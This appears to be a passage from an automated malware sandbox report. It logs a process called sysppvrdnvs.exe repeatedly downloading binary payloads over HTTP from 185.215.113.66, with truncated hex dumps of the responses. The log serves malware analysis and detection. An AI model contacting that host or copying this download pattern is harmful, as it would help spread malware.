f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUYmj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f\|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
Oct 26, 2024 07:27:39.164963007 CEST	1236	IN	Data Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03 Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y\|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
Oct 26, 2024 07:27:39.164980888 CEST	1236	IN	Data Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82 Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
Oct 26, 2024 07:27:39.164994955 CEST	1236	IN	Data Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76 Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
Oct 26, 2024 07:27:39.165009022 CEST	848	IN	Data Raw: f3 c6 cf f8 95 24 43 84 1e 1f 9b 9c d9 67 06 dc 57 43 c0 ff d4 c9 b4 19 52 67 b0 40 5c 8f 00 ab 9d ff 39 47 b4 07 78 4f 3d ea 81 53 76 ad 4d 76 16 a5 b7 2e e5 b9 6d 89 3c f6 9f 00 cc a4 9a b7 cc 8f b1 36 f8 1a e3 38 6a df fd 09 9e 74 6f 47 14 bc Data Ascii: $CgWCRg@\9GxO=SvMv.m<68jtoG M,"p-R6(=6;BS)2Mq#+dM1;oyAzm@!<Enk ?C=\|9PednGDF%F-_!Y^uODIuH"oR^k=%
Oct 26, 2024 07:27:39.165021896 CEST	1236	IN	Data Raw: ad 95 59 91 d7 28 54 ef 51 84 46 db e5 53 f7 71 f1 33 56 72 29 88 ec c2 e4 04 b3 04 8d 85 6b fa eb 21 1e 3f c1 cd 6a e8 70 62 2c 89 83 9f e9 aa 4c 31 4b d8 50 5f 18 8f 4e 84 f8 9e 73 49 96 bb e8 59 9c 9c a1 d8 01 6c ff 89 82 e5 c1 1b cb ac 75 c8 Data Ascii: Y(TQFSq3Vr)k!?jpb,L1KP_NsIYlu../)7= xsr]IqB<c4$4:\|[@~6{++4F#).G:\u0&[bJylUJwBD>Mh(
Oct 26, 2024 07:27:39.165034056 CEST	1236	IN	Data Raw: 6a bc 1b 16 13 5a d7 e7 e7 8a 08 c2 40 82 be 3d 07 a0 8c ca d4 d3 a4 3a ce f8 18 be 70 6a a9 90 b8 a0 d5 7c d6 4b 59 e9 93 44 e9 24 db 17 af c2 f4 c4 7e 24 6e a3 62 a5 e3 22 81 f5 7d ad 9b ac 72 da eb 52 75 7b 35 a0 4a dc 06 b1 a6 04 fb 06 9f 40 Data Ascii: jZ@=:pj\|KYD$~$nb"}rRu{5J@LY{\eY d8`}$@[b V;)WD1)%ohXg 6w{,xhmLCb*Ulh&H&_#>1+OO;yj
Oct 26, 2024 07:27:39.165050030 CEST	424	IN	Data Raw: ec 28 a1 5e 13 d9 94 e5 d5 cc 4f d4 53 24 26 95 81 d4 3f a1 4a 6c a5 f2 fd e4 5b e3 0c e9 e7 65 bc 92 3a 13 73 84 d2 38 c7 d6 4d fc 0d bc e9 eb 66 cf 3f ac d0 0c 51 43 7f c9 78 93 43 f1 7a 09 55 f3 77 f0 25 0d 74 b2 f7 4d 99 6f 02 b6 f5 75 65 55 Data Ascii: (^OS$&?Jl[e:s8Mf?QCxCzUw%tMoueUiQerj1F\FC1qIfbh\I.Xj[R)^F2NziS?rT+._s<mXF{H9xL +!aGSR$>M
Oct 26, 2024 07:27:39.165060997 CEST	536	IN	Data Raw: b2 25 da 20 db e3 b2 38 79 3f fa da 49 f5 48 08 d8 37 e6 42 37 9c 23 52 b2 14 9d 3f 51 1c 92 66 1d 0c 45 5e a7 ad b6 d4 a1 fd 2f f0 9f f8 43 57 d4 0a fd 96 a4 b5 49 1f 79 e4 6a c2 75 6b c3 26 ba 90 f2 17 f7 78 f3 39 cd 89 93 61 36 d3 ed 80 54 51 Data Ascii: % 8y?IH7B7#R?QfE^/CWIyjuk&x9a6TQ)t!)z[c=FR"#{'qd(;I0}<l#%/0>$L%j,6SpcqFjAc0%GhGci,gI\&<&sQpc,}KFz#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49994	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:40.190201998 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:41.095006943 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:40 GMT Content-Type: application/octet-stream Content-Length: 8960 Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT Connection: keep-alive ETag: "671230ee-2300" Accept-Ranges: bytes Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED] Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI\|<iq#O@5U\|{`)]Hx-dR~A}"2 +(Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi\|/>y4m3hO;<\|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUYmj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f\|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
Oct 26, 2024 07:27:41.095020056 CEST	112	IN	Data Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03 Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y\|^WaO".m).=WP
Oct 26, 2024 07:27:41.095031977 CEST	1236	IN	Data Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
Oct 26, 2024 07:27:41.095050097 CEST	1236	IN	Data Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fO
Oct 26, 2024 07:27:41.095060110 CEST	224	IN	Data Raw: 84 70 54 7d 76 a7 80 23 30 99 b6 5d 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e Data Ascii: pT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7\|I5Y&hOhAcUz(S7S})!s%F'GWfS\D
Oct 26, 2024 07:27:41.095117092 CEST	1236	IN	Data Raw: 35 91 9b c1 14 4c d0 91 fe aa bd 52 c5 29 72 9d e3 bc 39 de cd a5 b4 b1 58 e9 96 a3 2b 25 d0 11 07 be f8 ed 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 Data Ascii: 5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-Yt;\|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ{s`#U
Oct 26, 2024 07:27:41.095128059 CEST	212	IN	Data Raw: 33 10 82 8d 90 54 9e bb 7c c3 87 86 d3 12 55 e8 4a 8a 16 82 0c 91 2e b8 d1 1d bb bf dc e7 4c f3 af 8e cf 43 b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 Data Ascii: 3T\|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@
Oct 26, 2024 07:27:41.095139027 CEST	1236	IN	Data Raw: 23 26 41 95 d6 f4 47 d6 20 3d bc 4f 50 9f 70 c8 2a ca bb 9f 75 04 ec 4c 78 e9 cd 21 24 bf 41 c9 3c 1f 02 0d 0c 6b 5f 78 8c 6d 80 4f c4 9c 10 d7 a7 16 ed e8 db 31 d2 3e b4 8d 06 f3 89 82 e0 00 18 10 e6 b1 b2 76 dd 0c 87 c7 fc d5 16 40 07 cc 0c 4f Data Ascii: #&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\isoh-%a~4A7n7C;0PQCgkwNz8NMxAbZYPU4]&^eqDuTbF8
Oct 26, 2024 07:27:41.095151901 CEST	212	IN	Data Raw: 2b c3 59 1d 8c 11 5f 25 7d e2 e2 9a 61 a8 5c 77 5f af ad 72 90 61 0a a4 3d fa a9 ad 0c e2 cb 4e 2e f3 97 1d 3e 65 ad 91 95 40 06 62 cf cd fa a2 e9 92 23 9a 54 5c df fb 40 41 24 e3 46 4d 16 2e 80 31 0d 21 e9 46 fb 57 79 e0 10 dc 1e 09 05 37 4a 4b Data Ascii: +Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fs
Oct 26, 2024 07:27:41.095350981 CEST	1236	IN	Data Raw: e8 41 e9 46 88 29 2c d0 af 9c 6c 3b f5 6d 4e bd f9 7c b7 23 7b cb b1 f8 96 d8 53 fe 3f be 96 26 50 3c 47 35 49 6a a2 8d e5 eb f1 be b1 59 c1 57 59 3e bf 71 9c e0 2b b6 a7 db 66 8e 4c 7e a3 89 9f d8 7f 57 d1 12 9b 88 35 9c 47 58 50 b1 15 e3 ad 81 Data Ascii: AF),l;mN\|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@=:pj\|KYD$~$nb"}rRu{5J@LY{\eY d8`}$@[b V;)WD1)%
Oct 26, 2024 07:27:41.100641966 CEST	1048	IN	Data Raw: 6b f9 d6 65 d0 df f9 26 75 2b 62 0d a1 d9 0d 49 d6 42 dd 60 15 da d4 ac 1b cb a2 db 9a 23 a2 a9 bc 30 73 1b 27 ac 5d a1 f6 8b 14 c2 0e 0f f5 42 18 a3 f1 17 e9 34 cc 2f c2 81 9d a2 10 8b 06 38 16 3e d6 09 12 90 e2 58 81 d1 01 75 e4 d0 50 cc b3 83 Data Ascii: ke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&?Jl[e:s8Mf?QCxCzUw%tMoueUiQerj1F\FC1qIfbh\I.Xj[R)^
Oct 26, 2024 07:27:47.250740051 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:47.532815933 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:47 GMT Content-Type: application/octet-stream Content-Length: 16128 Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT Connection: keep-alive ETag: "66f3a973-3f00" Accept-Ranges: bytes Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED] Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H\|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:\|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49996	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:48.610920906 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:50.560194969 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:49 GMT Content-Type: application/octet-stream Content-Length: 16128 Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT Connection: keep-alive ETag: "66f3a973-3f00" Accept-Ranges: bytes Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED] Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H\|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:\|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
Oct 26, 2024 07:27:50.560209990 CEST	1236	IN	Data Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12 Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H\|f\|'x\R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He
Oct 26, 2024 07:27:50.560225010 CEST	1236	IN	Data Raw: 79 66 85 08 93 95 1d 74 ce 4a 11 6d 82 e1 0a e2 81 2a fe 53 85 e7 03 3d 26 89 2a ac bc 6b 82 a8 ad b3 ff 6f 2b 13 be 1a 78 df 38 94 08 4e 19 a1 85 a6 e7 97 55 2a 34 6a c4 05 a0 b4 7d d6 cf ac 4f ad fd 67 d8 7a 3f 8d 05 43 ee 09 c1 87 a8 e4 28 65 Data Ascii: yftJmS=&ko+x8NU4j}Ogz?C(ekds&;`!R[8ipurbyc'Xgy88(BAoqb\3mc2kg&;Rao#``2C(BRcAEy3.(d{A
Oct 26, 2024 07:27:50.560239077 CEST	1236	IN	Data Raw: 13 cc c0 02 63 9a f7 32 ef 05 a2 d8 0c a2 f0 13 e8 02 8c 5a 9f a4 b1 f5 8e 8e f2 44 26 09 e9 eb 90 01 b6 1f 6f ef 7a 7b 6f 72 b5 32 43 3f 03 45 5d 21 47 fb e4 6d 8f 19 57 dc 36 a6 1f d0 65 d6 13 fb 52 58 f0 b0 74 c9 f1 06 93 12 b1 0d 2c 66 18 38 Data Ascii: c2ZD&oz{or2C?E]!GmW6eRXt,f8}(nr(D3:cGl6fq{>QAB1T[~3#VPv\|lF;yHu^-z\|&#BzHrsexJJe"x
Oct 26, 2024 07:27:50.560255051 CEST	448	IN	Data Raw: 4d b9 18 90 d4 38 76 76 8e 16 f6 0a 59 48 91 a3 93 98 f2 86 31 48 c5 b8 1a b7 55 d7 56 ae db 47 94 4e e3 d4 dd cd 6f 2d b7 81 e1 b6 d4 ac be 14 1b 6b 69 39 d1 1e 41 b7 ed ba 57 d3 37 f5 b2 53 02 3c 83 b2 18 e9 a1 27 03 1c a4 eb 7d e8 fa 1e 6f 09 Data Ascii: M8vvYH1HUVGNo-ki9AW7S<'}o.M7"e}'d\(K+\3C[6N3nrd#Yf4UfQ"^,`:f=kF'OG.u2~o8?_s}T^_+=y?PtVOD/m
Oct 26, 2024 07:27:50.560271025 CEST	1236	IN	Data Raw: 02 d1 11 2f 72 9b 7a b4 01 d2 db 0a 07 26 2f ea cf 44 29 14 34 df 1d 96 d2 76 1e 73 e3 33 a7 b8 4c a4 0f 10 bf 01 51 16 71 3e eb 26 f9 24 1a 07 fe b4 50 e9 db 98 bc 52 26 1e 30 80 de 2a 3e 9d 25 da 68 85 ff ba 7e 3f 6a 98 d6 8a 77 b5 8f 1b a7 90 Data Ascii: /rz&/D)4vs3LQq>&$PR&0>%h~?jw)pg8J Zhpl^yh(qKoIPNI]#s"&dE5iwvN1\{m"j-}dG+@7YJ!,zxa0B#dPI@$H1<X(a
Oct 26, 2024 07:27:50.560287952 CEST	1236	IN	Data Raw: b8 2c 8e 1e 0b 32 be 35 6b 43 1b 9b 6c 23 01 01 70 7f ea 33 d4 ce 40 cd 5e c5 d9 4a 62 ee 9a bc 2e 3f dd 6a cd 34 56 2d 27 16 2f 1a cf 68 59 a5 a8 ce 82 a4 f2 5e 6b c7 7d b7 13 16 b6 cb fe 18 03 a3 8e 42 5b ab 58 25 fd 4a bb 4e eb 16 00 ba fd a2 Data Ascii: ,25kCl#p3@^Jb.?j4V-'/hY^k}B[X%JNS{\vPe<[W7b${SXTb]_'g'P^4e-bo1EG$S}vjHW2x,gph- 88u'7:wc #?2UK7+jg}5G
Oct 26, 2024 07:27:50.560359955 CEST	1236	IN	Data Raw: 02 58 41 5b 0c 4b 2b 82 84 ee 4f 15 14 d7 87 0d 51 f2 4d e1 be 09 b1 56 63 16 38 fe 34 9a 85 53 0b 35 55 c3 6e 61 86 5d 50 b3 05 3a e7 66 dd b5 9b 7c 86 fd fd 79 af 5a 22 bb d7 f3 c1 7f 83 c6 31 5d ca 90 29 19 c0 30 92 c8 30 e4 93 65 8b bb 60 d6 Data Ascii: XA[K+OQMVc84S5Una]P:f\|yZ"1])00e`Zx[w!1Om)$BEAi%2<Y8\{nGU3T!yY/=`J[tM8Vqp(cG'^,z/m5=Z:SNga9uNCzB\D#
Oct 26, 2024 07:27:50.560398102 CEST	1236	IN	Data Raw: 7f b4 7e d3 e3 0a e2 a1 b4 32 8e 2d da 79 51 32 05 90 ea e6 4e 42 7d 97 57 a8 40 ab de 5b 53 16 23 a1 13 7b 91 eb b7 30 18 72 54 4b 19 b2 61 2a 5a 25 b6 eb 68 01 fd ec 6f fd 6d 35 9d 87 a9 71 a1 d3 0a 7d 5c be 01 c0 e5 75 22 11 f2 5b 68 3f ca d6 Data Ascii: ~2-yQ2NB}W@[S#{0rTKa*Z%hom5q}\u"[h?Vwp$r6+1'Jw`z'cnYsoB3=7FS: ;c0wd_(.5&;$ 9e\?A-WR<}jlcH&qJ$
Oct 26, 2024 07:27:50.560416937 CEST	1236	IN	Data Raw: 52 a2 37 4c 29 68 6d 5c 7b 6d ad 57 6e bd 5d b9 24 b6 0d 6f 82 0d d1 f8 26 1e ca bc 22 40 80 32 97 46 d3 3b a5 e5 88 d0 74 15 20 a8 e8 61 92 d4 e6 44 8f 0a a1 d3 80 65 16 96 1e 35 68 39 e6 f7 02 57 11 c9 d4 a8 2c 7f 23 a7 31 3f 83 70 d4 7e b7 b1 Data Ascii: R7L)hm\{mWn]$o&"@2F;t aDe5h9W,#1?p~Pj)H#j})v0x`o({8 db*?8]#P4\E`IG`WKO&wj5,Zsl>47\|[;^\1qlURt(6tV^j(
Oct 26, 2024 07:27:50.560453892 CEST	1236	IN	Data Raw: 87 58 2a 19 d8 c4 a7 56 f1 dd ef f6 28 fe 34 19 03 f1 ff e8 dd b1 86 51 9c ca ca de 05 61 7e 8a 73 d0 b7 35 6b 7c d5 65 15 67 4c 62 e3 f5 c3 b4 70 2f 71 e3 7e c9 19 9a 65 31 92 e9 c4 8b cd c0 0c 4f 69 9e 96 33 c2 47 25 6a 98 c9 5e a1 a3 c8 ab 8d Data Ascii: XV(4Qa~s5k\|egLbp/q~e1Oi3G%j^P u\(psGj"QL7:'P?\|Rrd@}F\:3~9"KcLpFm_e/lux#292"y/rQ[y
Oct 26, 2024 07:27:50.560786009 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:49 GMT Content-Type: application/octet-stream Content-Length: 16128 Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT Connection: keep-alive ETag: "66f3a973-3f00" Accept-Ranges: bytes Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 